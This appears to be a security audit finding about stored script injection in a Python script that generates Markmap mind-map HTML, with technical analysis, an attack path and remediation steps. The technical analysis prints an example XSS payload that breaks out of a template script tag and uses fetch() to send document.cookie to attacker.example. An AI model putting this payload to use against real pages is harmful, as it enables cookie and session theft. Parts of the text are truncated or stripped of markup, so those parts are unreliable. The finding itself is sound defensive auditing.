T09 · Insecure Skill Coding Practices
- Location
scripts/mindmap.py:164- Finding
Stored Script Injection in Generated Markmap HTML
- Content
View full analysis
{structure['title']} - 思维导图 body {{ margin: 0; padding: 20px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; }} .markmap {{ width: 100%; height: 80vh; }}🧠 {structure['title']}
''' ``` ### Technical Analysis The title and mind-map node content originate from user-controlled input and are interpolated directly into an HTML document without context-aware escaping. The title is inserted into both `` and `<h1>` elements, while the complete Markdown tree is inserted inside a `<script type="text/template">` element. Although the template script is not directly executable, an attacker can supply a sequence such as: ```html </script><script>fetch('https://attacker.example/collect?d=' + encodeURIComponent(document.cookie))</script> ``` The injected `</script>` terminates the template element. The following script element is then parsed as executable JavaScript when the generated HTML file is opened. Escaping quotation marks or Markdown syntax alone would not address this issue because HTML parsing rules, particularly script-element termination, govern exploitation. ### Attack Path 1. An attacker supplies a malicious title, keyword, or text node to the mind-map generator. 2. `extract_structure()` or `generate_from_keywords()` preserves the malicious content as a node title. 3. `to_markmap()` inserts that content into the ...[truncated 973 chars]- Remediation
View remediation
``` 5. Add regression tests containing payloads such as ``, ``, HTML entities, and malicious titles. 6. Treat generated HTML as active content and warn users before opening files derived from untrusted input. ]]>
